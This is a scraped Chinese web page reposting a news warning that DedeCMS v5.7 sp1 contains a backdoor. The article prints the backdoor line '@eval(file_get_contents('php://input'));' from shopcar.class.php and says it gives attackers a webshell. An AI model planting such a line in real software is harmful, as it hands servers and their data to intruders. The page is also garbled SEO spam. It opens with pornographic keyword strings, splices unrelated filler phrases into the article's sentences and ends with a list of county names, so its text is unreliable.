91日本在线精品高清观看_91日韩精品久久久久精品_日韩人妻无码精品一专区首页|在线欧美精品视频小说二区_久久精品人妻综合AV|欧美精品视频在线看免费观看-欧美精品视频在线看视频-欧美日韩国产精品视频,欧美日韩中文字幕日韩欧美一区二区三区

返回頂部
關(guān)閉軟件導(dǎo)航
位置:首頁 > 資訊 > 織夢新聞>織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保
  

  【IT168資訊】瑞星公司今日對外發(fā)布緊急警示:國內(nèi)知名的PHP開源網(wǎng)站管理系統(tǒng)——織夢CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門,黑客可通過此后門直接獲得網(wǎng)站的控制權(quán)限帶動產業發展,獲取存儲在服務(wù)器上的文件和數(shù)據(jù)庫責任製。據(jù)CMS官方數(shù)據(jù)顯示,目前約有70萬網(wǎng)站使用該系統(tǒng)搭建織夢文章批量自動上傳助手倍增效應,涉及企業(yè)規則製定、政府機關(guān)、媒體機構(gòu)優化服務策略、行業(yè)及個人網(wǎng)站等關規定。瑞星公司特此緊急提醒使用該系統(tǒng)的網(wǎng)站管理員織夢批量更新 ,使用瑞星網(wǎng)站密碼安全檢測系統(tǒng)查找后門并及時進行封堵兩個角度入手。

  

  據(jù)專家介紹安全鏈,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門織夢軟件采集創新為先,黑客只需要構(gòu)造簡單的數(shù)據(jù)包提交到服務(wù)器真正做到,就能夠獲取到該網(wǎng)站的WebShell,通過對服務(wù)器進一步滲透攻擊創新延展,進而獲取服務(wù)器的最高權(quán)限強化意識。

  

  織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網(wǎng)站后,便可以直接訪問服務(wù)器上的文件基本情況、數(shù)據(jù)庫等信息現場。目前我國有大量網(wǎng)站采用該系統(tǒng),此后門或?qū)?dǎo)致大量用戶的信息泄露力量,造成極為嚴(yán)重的影響探討。

如果您覺得 織夢CMS系統(tǒng)現(xiàn)后門70萬網(wǎng)站資料恐不保 這篇文章對您有用,請分享給您的好友調解製度,謝謝
文章地址:http://cdgoodok.com/article/dede/zmCMSxtxhmwwzzlkbb.html
解放雙手無盡可能,有問題添加天線貓微信
葫芦岛市| 三明市| 廊坊市| 千阳县| 方城县| 临桂县| 广安市| 四会市| 黑山县| 重庆市| 襄城县| 郯城县| 巴东县| 广州市| 温州市| 和硕县| 那曲县| 武陟县| 新巴尔虎右旗| 溧水县| 曲阳县| 昆明市| 隆昌县| 卢湾区| 淳化县| 大城县| 湄潭县| 桐乡市| 衡南县| 武山县| 萍乡市| 剑川县| 沙雅县| 界首市| 荣昌县| 河北省| 宁远县| 兴仁县| 米泉市| 安多县| 犍为县|